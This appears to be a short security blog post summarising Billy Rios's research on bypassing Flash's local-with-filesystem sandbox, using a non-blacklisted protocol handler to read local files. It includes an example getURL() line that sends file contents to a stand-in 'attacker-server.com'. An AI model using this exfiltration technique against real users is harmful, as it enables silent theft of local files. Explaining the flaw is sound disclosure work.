Thursday, January 06, 2011

Bypassing Flash Local-with-filesystem Sandbox

Background:
  • Flash is designed around the sandbox concept.
  • Flash cannot read local files except for the cookie files.
What Billy Rios did recently in his research:
  • Bypass the restriction and make flash to access any local and remote files.
  • Found a protocol handler that wasn't blacklisted by Adobe.
  • User will not be prompted for permission when bypassing attempts.
Summary of how it works:
  • Using file:// and point to local system. Eg: file://\\192.168.1.1\stolen-data-here\
  • Then pass the content back to attacker server via getURL(). Eg: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);
References: